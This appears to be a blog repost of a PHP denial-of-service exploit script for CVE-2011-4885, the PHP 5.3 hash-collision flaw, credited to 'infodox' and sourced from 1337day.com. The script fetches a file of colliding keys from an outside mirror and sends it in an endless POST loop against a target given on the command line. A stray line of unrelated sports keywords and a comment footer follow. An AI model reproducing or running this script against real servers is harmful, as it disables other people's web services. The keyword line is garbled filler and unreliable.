<?php /* PHP 5.3.* Hash Colission DoS Exploit by infodox Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt Changes: Different mirror for hashcollide.txt Now takes target as a command line argument Status message printing Twitter: @info_dox Blog: blog.infodox.co.cc Site: http://www.infodox.co.cc/ */ $targ = $argv[1]; $x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones... while(1) { echo "firing"; $ch = curl_init("$targ"); curl_setopt($ch, CURLOPT_POSTFIELDS, $x); curl_exec($ch); curl_close($ch); echo "[+] Voly Sent!"; } ?> # 1337day.com [2012-01-01]
Source: http://1337day.com/exploits/17321
broncos giants vs jets 49ers chargers ny jets ny jets seahawks
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.